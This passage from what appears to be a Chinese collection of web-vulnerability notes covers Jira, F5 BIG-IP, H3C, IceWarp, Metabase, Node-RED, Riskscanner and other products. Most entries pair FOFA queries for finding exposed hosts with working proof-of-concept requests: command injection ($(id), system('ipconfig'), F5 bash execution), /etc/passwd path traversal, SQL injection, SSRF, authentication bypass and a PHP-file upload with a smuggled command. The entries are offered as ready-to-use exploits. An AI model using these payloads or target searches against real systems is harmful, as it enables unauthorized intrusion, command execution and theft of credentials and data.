groupuserpicker接口存在用户信息枚举漏洞,攻击者通过漏洞可以获取应用中的使用者账户名称,来进行进一步渗透 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Atlassian Jira <8.4.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="ATLASSIAN-JIRA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241426135.png)验证POC 24 | 25 | ``` 26 | /rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false 27 | ``` 28 | 29 | 当用户存在时 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241426482.png) 32 | 33 | 当用户不存在时 34 | 35 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241427885.png) -------------------------------------------------------------------------------- /Web应用漏洞/Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451.md: -------------------------------------------------------------------------------- 1 | # Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451 2 | 3 | ## 漏洞描述 4 | 5 | Jira的 /plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Atlassian Jira <8.4.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="ATLASSIAN-JIRA" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241427027.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /plugins/servlet/gadgets/makeRequest?url=http://目标IP@www.baidu.com/robots.txt 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241427776.png) -------------------------------------------------------------------------------- /Web应用漏洞/Casbin get-users 账号密码泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # Casbin get-users 账号密码泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Casbin get-users api接口存在账号密码泄漏漏洞,攻击者通过漏洞可以获取用户敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Casbin 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Casdoor" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220524143206718](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241432780.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /api/get-users?p=123&pageSize=123 29 | ``` 30 | 31 | ![image-20220524143215583](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241432624.png) -------------------------------------------------------------------------------- /Web应用漏洞/Cerebro request SSRF漏洞.md: -------------------------------------------------------------------------------- 1 | # Cerebro request SSRF漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Cerebro是使用Scala、Play Framework、AngularJS和Bootstrap构建的开源的基于Elasticsearch Web可视化管理工具。您可以通过Cerebro对集群进行web可视化管理,如执行rest请求、修改Elasticsearch配置、监控实时的磁盘,集群负载,内存使用率等。其中某功能存在SSRF漏洞,攻击者通过发送特定的请求包可以探测内网信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Cerebro 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Cerebro" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220524143249335](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241432380.png) 24 | 25 | 发送请求包 26 | 27 | ``` 28 | POST /rest/request 29 | 30 | {"method":"GET","data":"","path":"robots.txt","host":"https://www.baidu.com"} 31 | ``` 32 | 33 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241433022.png) -------------------------------------------------------------------------------- /Web应用漏洞/Coremail 配置信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # Coremail 配置信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Coremail 某个接口存在配置信息泄露漏洞,其中存在端口,配置信息等 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Coremail 配置信息泄露漏洞 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Coremail邮件系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | POC为 22 | 23 | ```plain 24 | http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/ 25 | ``` 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101913188.png) 28 | 29 | 30 | -------------------------------------------------------------------------------- /Web应用漏洞/E-message 越权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # E-message 越权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | E-message 存在越权访问漏洞,由于配置页面没有做权限设定,导致攻击者可以访问并重置账号密码等操作 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | E-message 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="emessage 设置: 数据库设置 - 标准连接" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问安装页面 22 | 23 | ```plain 24 | http://xxx.xxx.xxx.xxx/setup/setup-datasource-standard.jsp 25 | ``` 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101934751.png) 28 | 29 | 30 | 31 | 可以获取账号密码信息,一路点击右下角的继续将会跳转修改管理员账号密码页面,修改后登录即可获取后台权限 32 | 33 | 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101934975.png) -------------------------------------------------------------------------------- /Web应用漏洞/Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Evolucare Ecsimaging download_stats_dicom.php 存在文件读取漏洞,攻击者可利用该漏洞获取系统敏感信息等. 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | EVOLUCARE Evolucare Ecsimaging 6.21.5 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="ECSimaging" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241445840.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /download_stats_dicom.php?fullpath=/etc/passwd&filename=/etc/passwd 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241445607.png) -------------------------------------------------------------------------------- /Web应用漏洞/Evolucare Ecsimaging new_movie.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Evolucare Ecsimaging new_movie.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | EVOLUCARE ECSimage是一款国外使用的医疗管理系统,研究发现其new_movie.php接口中存在命令注入漏洞,攻击者可利用该漏洞获取系统敏感信息等. 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | EVOLUCARE Evolucare Ecsimaging 版本< 6.21.5 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="ECSimaging" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241447357.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /new_movie.php?studyUID=1&start=2&end=2&file=1;pwd 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241447391.png) -------------------------------------------------------------------------------- /Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md: -------------------------------------------------------------------------------- 1 | # F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388 2 | 3 | ## 漏洞描述 4 | 5 | BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 11.6.1-16.1.2 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | icon_hash="-335242539" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241448502.png) 24 | 25 | 发送请求包(Host设为localhost) 26 | 27 | ``` 28 | POST /mgmt/tm/util/bash HTTP/1.1 29 | Host: localhost 30 | Authorization: Basic YWRtaW46 31 | X-F5-Auth-Token: a 32 | Connection: close, X-F5-Auth-Token 33 | Content-Length: 39 34 | 35 | {"command":"run","utilCmdArgs":"-c id"} 36 | ``` 37 | 38 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241449854.png) -------------------------------------------------------------------------------- /Web应用漏洞/Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360.md: -------------------------------------------------------------------------------- 1 | # Fhem FileLog_logWrapper 任意文件读取漏洞 CVE-2020-19360 2 | 3 | ## 漏洞描述 4 | 5 | FHEM在6.0版本中存在文件包含漏洞,该漏洞源于允许FHEM/FileLog_logWrapper file参数允许攻击者包含文件,攻击者可以利用此漏洞导致敏感信息泄露。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | FHEM 6.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title=="Home, Sweet Home" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220524144941606](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241449644.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text 29 | ``` 30 | 31 | ![image-20220524144955698](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241449759.png) -------------------------------------------------------------------------------- /Web应用漏洞/H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | H3C SecParh堡垒机 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="H3C-SecPath-运维审计系统" && body="2018" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091828935.png) 24 | 25 | 26 | 27 | 先通过任意用户登录获取Cookie 28 | 29 | ```plain 30 | /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 31 | ``` 32 | 33 | 34 | 35 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091828626.png) 36 | 37 | 38 | 39 | ```plain 40 | /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true 41 | ``` 42 | 43 | 44 | 45 | ![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091828206.png) -------------------------------------------------------------------------------- /Web应用漏洞/H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞.md: -------------------------------------------------------------------------------- 1 | # H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞 2 | 3 | ## 漏洞描述 4 | 5 | H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞 6 | 7 | 与齐治堡垒机出现的漏洞相似 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | H3C SecParh堡垒机 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | app="H3C-SecPath-运维审计系统" && body="2018" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 登录页面如下 24 | 25 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091826937.png) 26 | 27 | 28 | 29 | POC验证的Url为 30 | 31 | ```plain 32 | /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 33 | ``` 34 | 35 | 36 | 37 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091826692.png) 38 | 39 | 成功获取admin权限 40 | 41 | 42 | 43 | ## -------------------------------------------------------------------------------- /Web应用漏洞/Harbor 未授权创建管理员漏洞 CVE-2019-16097.md: -------------------------------------------------------------------------------- 1 | # Harbor 未授权创建管理员漏洞 CVE-2019-16097 2 | 3 | ## 漏洞描述 4 | 5 | 近日,镜像仓库Harbor爆出任意管理员注册漏洞,攻击者在请求中构造特定字符串,在未授权的情况下可以直接创建管理员账号,从而接管Harbor镜像仓库。我们得到消息,第一时间对该漏洞进了验证,官方已发布公告说明,最新的1.7.6和1.8.3已修复此漏洞,请使用到的用户尽快升级至安全版本。 6 | 7 | Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器。Harbor 1.7.0版本至1.8.2版本中的core/api/user.go文件存在安全漏洞。攻击者通过在请求中添加关键参数,即可利用该漏洞创建管理员账户,从而接管Harbor镜像仓库。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | Harbor 1.7.0版本至1.8.2版本 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="Harbor" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 登录页面如下E 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101848179.png) 26 | 27 | 向**/api/user** 接口发送创建用户的请求, 状态码返回201即创建成功 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101848948.png) 30 | 31 | 32 | 33 | 使用创建的账户成功登录后台 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101848369.png) 36 | 37 | 38 | 39 | ## -------------------------------------------------------------------------------- /Web应用漏洞/Hue 后台编辑器命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Hue 后台编辑器命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Hue 后台编辑器存在命令执行漏洞,攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目的 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Hue 后台编辑器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Hue - 欢迎使用 Hue" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![hue-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/hue-1.png) 24 | 25 | 26 | 27 | 上传并编辑文件为执行的命令 28 | 29 | ![hue-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/hue-2.png) 30 | 31 | 32 | 33 | 按如下步骤点击即可执行想要执行的命令 34 | 35 | 36 | 37 | ![hue-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/hue-3.png) -------------------------------------------------------------------------------- /Web应用漏洞/IBOS 数据库模块 后台任意文件上传漏洞.md: -------------------------------------------------------------------------------- 1 | # IBOS 数据库模块 后台任意文件上传漏洞 2 | 3 | ## 漏洞描述 4 | 5 | IBOS 后台数据库模块 存在任意文件上传漏洞,攻击者进入后台后可以上传恶意文件控制服务器 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | IBOS < 4.5.5 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="IBOS" && body="login-panel" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ```plain 24 | http://xxx.xxx.xxx.xxx/?r=dashboard/default/login 25 | ``` 26 | 27 | 28 | 29 | 找到数据库备份模块 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091853548.png) 34 | 35 | 36 | 37 | 提交并抓包 38 | 39 | 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091853668.png) 42 | 43 | 44 | 45 | 修改filename参数发送包会上传test.php文件到根目录 46 | 47 | 48 | 49 | ```plain 50 | backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=peiqi%26echo "">test%PATHEXT:~0,1%php%26test&dbSubmit=1 51 | ``` 52 | 53 | 54 | 55 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091854875.png) -------------------------------------------------------------------------------- /Web应用漏洞/ICEFlow VPN 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # ICEFlow VPN 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | ICEFlow VPN 存在信息泄露漏洞,攻击者可以查看日志中的敏感数据来进一步攻击系统 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | ICEFlow VPN 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="ICEFLOW VPN Router" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 可访问的日志 Url 22 | 23 | ```plain 24 | 系统日志 http://url/log/system.log 25 | VPN日志 http://url/log/vpn.log 26 | 访问日志 http://url/log/access.log 27 | 告警日志 http://url/log/warn.log 28 | 错误日志 http://url/log/error.log 29 | 调试日志 http://url/log1/debug.log 30 | 移动用户日志 http://url/log/mobile.log 31 | 防火墙日志 http://url/log/firewall.log 32 | ``` 33 | 34 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101850471.png) 35 | 36 | 37 | 38 | 根据日志信息获得session后,可利用实时登录系统管理后台: 39 | 40 | 41 | 42 | ```plain 43 | http://xxx.xxx.xxx.xxx/cgi-bin/index?oid=10&session_id=xxxxxxxxxxxxxx&l=0 44 | ``` 45 | 46 | -------------------------------------------------------------------------------- /Web应用漏洞/IceWarp WebClient basic 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # IceWarp WebClient basic 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | IceWarp WebClient 存在远程命令执行漏洞,攻击者构造特殊的请求即可远程命令执行 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | IceWarp WebClient 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="IceWarp-公司产品" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101850566.png) 24 | 25 | 26 | 27 | 漏洞请求包为 28 | 29 | ```plain 30 | POST /webmail/basic/ HTTP/1.1 31 | Host: sd.sahadharawat.com 32 | Content-Type: application/x-www-form-urlencoded 33 | Cookie: use_cookies=1 34 | Content-Length: 43 35 | 36 | _dlg[captcha][target]=system(\'ipconfig\')\ 37 | ``` 38 | 39 | 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101851258.png) -------------------------------------------------------------------------------- /Web应用漏洞/Jupyter Notebook 未授权访问远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Jupyter Notebook 未授权访问远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 6 | 7 | 如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | Jupyter Notebook 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | app="Jupyter-Notebook" && body="Terminal" 19 | ``` 20 | 21 | ## 环境搭建 22 | 23 | Vulhub运行测试环境: 24 | 25 | ``` 26 | docker-compose up -d 27 | ``` 28 | 29 | 运行后,访问`http://your-ip:8888`将看到Jupyter Notebook的Web管理界面,并没有要求填写密码。 30 | 31 | ![image-20220224195831711](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202241958784.png) 32 | 33 | ## 漏洞复现 34 | 35 | 访问目标, 点击new→Terminal即可创建一个控制台,可以直接执行任意命令: 36 | 37 | ![image-20220224195857801](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202241958870.png) 38 | 39 | 执行命令并反弹shell: 40 | 41 | ![image-20220224200055046](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202242000102.png) 42 | 43 | 监听2333端口,成功接收反弹shell: 44 | 45 | ![image-20220224200143472](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202242001536.png) 46 | -------------------------------------------------------------------------------- /Web应用漏洞/MKdocs 任意文件读取漏洞 CVE-2021-40978.md: -------------------------------------------------------------------------------- 1 | # MKdocs 任意文件读取漏洞 CVE-2021-40978 2 | 3 | ## 漏洞描述 4 | 5 | MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Mkdocs 1.2.2 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="My Docs" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220524152422662](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241524715.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 29 | ``` 30 | 31 | ![image-20220524152444205](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241524264.png) -------------------------------------------------------------------------------- /Web应用漏洞/Metabase geojson 任意文件读取漏洞 CVE-2021-41277.md: -------------------------------------------------------------------------------- 1 | # Metabase geojson 任意文件读取漏洞 CVE-2021-41277 2 | 3 | ## 漏洞描述 4 | 5 | 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | metabase version < 0.40.5 11 | metabase version >= 1.0.0, < 1.40.5 12 | ``` 13 | 14 | ## FOFA 15 | 16 | ``` 17 | app="metabase" 18 | ``` 19 | 20 | ## 漏洞复现 21 | 22 | 登录页面 23 | 24 | ![image-20220524152541900](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241525945.png) 25 | 26 | 验证POC 27 | 28 | ``` 29 | /api/geojson?url=file:/etc/passwd 30 | ``` 31 | 32 | ![image-20220524152721994](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241527087.png) -------------------------------------------------------------------------------- /Web应用漏洞/Node-RED ui_base 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # Node-RED ui_base 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join, 6 | 7 | 缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | Node-RED 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="Node-RED" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 访问页面 24 | 25 | 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101928889.png) 28 | 29 | 验证POC 30 | 31 | 32 | 33 | ```plain 34 | /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 35 | /ui_base/js/..%2f..%2f..%2f..%2fsettings.js 36 | ``` 37 | 38 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101928013.png) 39 | 40 | 41 | 42 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101928766.png) -------------------------------------------------------------------------------- /Web应用漏洞/OneBlog 小于v2.2.1 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # OneBlog 小于v2.2.1 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | OneBlog 小于v2.2.1 由于使用含有漏洞版本的Apache Shiro和默认的密钥导致存在远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | OneBlog <= v2.2.1 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="OneBlog开源博客后台管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101909905.png) 26 | 27 | 28 | 29 | 使用工具直接利用Apache Shiro漏洞即可 30 | 31 | 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101909954.png) -------------------------------------------------------------------------------- /Web应用漏洞/Riskscanner list SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # Riskscanner list SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Riskscanner list接口存在SQL注入漏洞,通过漏洞可获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Riskscanner 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Riskscanner" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101940023.png) 26 | 27 | 28 | 29 | 发送漏洞请求包 30 | 31 | 32 | 33 | ```plain 34 | POST /resource/list/1/10 HTTP/1.1 35 | Host: 36 | Content-Length: 41 37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 38 | Content-Type: application/json;charset=UTF-8 39 | 40 | {"sort":"1)a union select sleep(5) -- -"} 41 | ``` 42 | 43 | 44 | 45 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101940005.png) 46 | 47 | 48 | 49 | 使用工具Sqlmap 50 | 51 | 52 | 53 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101940424.png) -------------------------------------------------------------------------------- /Web应用漏洞/SonarQube search_projects 项目信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # SonarQube search_projects 项目信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | SonarQube 某接口存在信息泄露漏洞,可以通过工具下载源码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | SonarQube 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="sonarQube-代码管理" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页如下 22 | 23 | 24 | 25 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101932489.png) 26 | 27 | 28 | 29 | 漏洞POC 30 | 31 | 32 | 33 | ```plain 34 | http://xxx.xxx.xxx.xxx/api/components/search_projects 35 | ``` 36 | 37 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101932452.png) 38 | 39 | 可通过工具下载项目中的源代码 40 | 41 | 42 | 43 | https://github.com/deletescape/sloot 44 | 45 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101932586.png) -------------------------------------------------------------------------------- /Web应用漏洞/SonarQube values 信息泄露漏洞 CVE-2020-27986.md: -------------------------------------------------------------------------------- 1 | # SonarQube values 信息泄露漏洞 CVE-2020-27986 2 | 3 | ## 漏洞描述 4 | 5 | SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | SonarQube 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="sonarQube-代码管理" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101933673.png) 24 | 25 | 26 | 27 | 漏洞POC 28 | 29 | 30 | 31 | ```plain 32 | http://xxx.xxx.xxx.xxx/api/settings/values 33 | ``` 34 | 35 | 36 | 37 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101933276.png) 38 | 39 | 40 | 41 | 可泄露的为:明文SMTP、SVN和Gitlab等敏感信息 42 | 43 | 44 | 45 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101934123.png) 46 | 47 | 48 | 49 | ## -------------------------------------------------------------------------------- /Web应用漏洞/SpiderFlow save 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # SpiderFlow save 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | SpiderFlow 平台以流程图的⽅式定义爬虫,是⼀个高度灵活可配置的爬虫平台 6 | 7 | 官⽹:https://www.spiderflow.org/ 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | SpiderFlow 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title=="SpiderFlow" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 主页面 24 | 25 | ![image-20220524153437590](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241534681.png) 26 | 27 | 发送请求包执行命令 28 | 29 | ``` 30 | POST /function/save 31 | 32 | 